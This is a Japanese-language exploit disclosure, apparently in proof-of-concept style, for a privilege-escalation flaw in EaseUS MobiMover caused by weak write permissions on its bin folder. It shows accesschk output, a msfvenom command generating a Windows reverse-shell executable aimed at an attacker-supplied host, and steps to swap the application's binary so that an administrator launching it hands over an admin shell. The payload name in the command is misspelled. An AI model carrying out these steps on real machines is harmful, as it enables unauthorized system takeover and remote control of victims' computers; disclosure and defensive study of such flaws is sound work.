
MobiMoverUILaunch.exe は権限昇格の脆弱性を抱えており、"認証されたユーザー"がサービス実行ファイルを自分の選択したバイナリに置き換えるために利用できます。この脆弱性は、"認証されたユーザーグループ"に割り当てられた弱いアクセス権限セットが原因で発生し、そのグループには (M) フラグ、つまり「変更権限」が付与されています。

ベンダーホームページ: https://www.easeus.com/
ソフトウェアリンク: https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
検証動画: https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
Kali Linux上でmsfvenomを使って悪意のあるバイナリファイルを作成する
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
作成した 'prepare.exe' を Kali から Windows ホストに低権限ユーザーとして転送する
作成した 'prepare.exe' バイナリファイルを 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' に移動し、古いファイルを低権限ユーザーとして置き換える
管理者がアプリケーションを実行すると、管理者権限でリバースシェルが取得できます